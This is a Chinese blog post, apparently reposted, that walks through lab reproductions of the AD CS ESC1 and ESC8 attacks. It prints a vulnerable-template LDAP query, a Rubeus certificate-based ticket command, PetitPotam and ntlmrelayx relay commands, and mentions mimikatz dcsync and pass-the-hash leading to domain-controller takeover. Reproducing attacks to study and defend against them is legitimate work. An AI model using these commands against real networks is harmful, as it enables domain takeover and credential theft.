ADCS系列之ESC1、ESC8复现

0收藏

0点赞

浏览量:2720

2021-07-30

举报

对原理感兴趣的可以去

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

看原文,这里只记录复现过程


ADCS漏洞--ESC1


在ADCS中,错误配置会导致普通域用户到域管理员的提权。主要体现在证书模板这里,在证书模板中,我们可以设置应用程序的策略。



我们比较关心的如下:


Client Authentication (OID 1.3.6.1.5.5.7.3.2)PKINIT Client Authentication (1.3.6.1.5.2.3.4)Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2)Any Purpose (OID 2.5.29.37.0)


这些可以使得我们拥有请求票据的功能,然后就是SAN的模拟,SAN允许我们使用UPN来指定用户,来达到用户模拟的目的。



其LDAP查询语句如下:


(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextend edkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4) (pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*)))(mspkicertificate-name-flag:1.2.840.113556.1.4.804:=1))


使用其发布的测试工具,PSPKIAudit测试显示存在ESC1漏洞。



攻击步骤


首先申请一张证书,并将upn名称改成域管



然后导出证书




用密码导出



然后使用rubeus攻击。


Rubeus.exe asktgt /user:administrator /certificate:3.pfx /password:123456 /ptt


  • /user:模拟的账户

  • /certificate:申请的证书

  • /password:证书密码


成功获取域控权限



ADCS漏洞--ESC8


也就是你们说的adcs relay。


ESC8是一个http的ntlm relay,原因在于ADCS的认证中支持ntlm认证,再具体的自己看白皮书。



默认即存在



下面开始攻击复现,首先我们需要搭建一个辅助域控



勾选域服务



安装即可,同理设置为域控



选择添加到现有域



选择从主域复制



重启后测试



下面即可开始攻击。


python3 Petitpotam.py -u '' -d '' -p '' "ntlmrelay address" "DC02 address"
ntlmrelayx.py -t http://adcs/certsrv/certfnsh.asp -smb2support --adcs --template 'DCTest'


获取到证书



然后使用证书请求DC02$的票据



获取票据成功




mimikatz进行dcsync



然后进行pth攻击,获取主域控权限



出现错误的话可以参考:


https://github.com/SecureAuthCorp/impacket/pull/1101


     ▼更多精彩推荐,请关注我们▼




( 来源:鸿鹄实验室)

(原文链接:https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247488328&idx=1&sn=b99df463ab7ce0b279e06224f560fb75)

发表评论

点击排行

钓鱼邮件-如何快速成为钓鱼达人

一、前言在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼邮件攻击使用的...

【渗透实战系列】| 1 -一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

本次渗透实战主要知识点:1.app抓包,寻找后台地址2.上传绕过,上传shell3.回shell地址的分析4.中国蚁剑工...

HTTPS - 如何抓包并破解 HTTPS 加密数据?

HTTPS 在握手过程中,密钥规格变更协议发送之后所有的数据都已经加密了,有些细节也就看不到了,如果常规的...

无线电安全攻防之GPS定位劫持

一、需要硬件设备HackRFHackRF 连接数据线外部时钟模块(TCXO 时钟模块)天线(淘宝套餐中的 700MHz-2700MH...

记一次Fastadmin后台getshell的渗透记录

1.信息搜集先来看看目标站点的各种信息后端PHP,前端使用layui,路由URL规则看起来像ThinkPHP,那自然想到...

华为防火墙实战配置教程,太全了

防火墙是位于内部网和外部网之间的屏障,它按照系统管理员预先定义好的规则来控制数据包的进出。防火墙是系...

【干货分享】利用MSF上线断网主机的思路分享

潇湘信安 Author 3had0w潇湘信安一个不会编程、挖SRC、代码审计的安全爱好者,主要分享一些安全经验、...

攻击工具分析:哥斯拉(Godzilla)

简介对,你没有看错,本期我们要研究的目标是哥斯拉。不过,此哥斯拉非彼哥斯拉,他是继菜刀、蚁剑、冰蝎之...

扫描二维码下载APP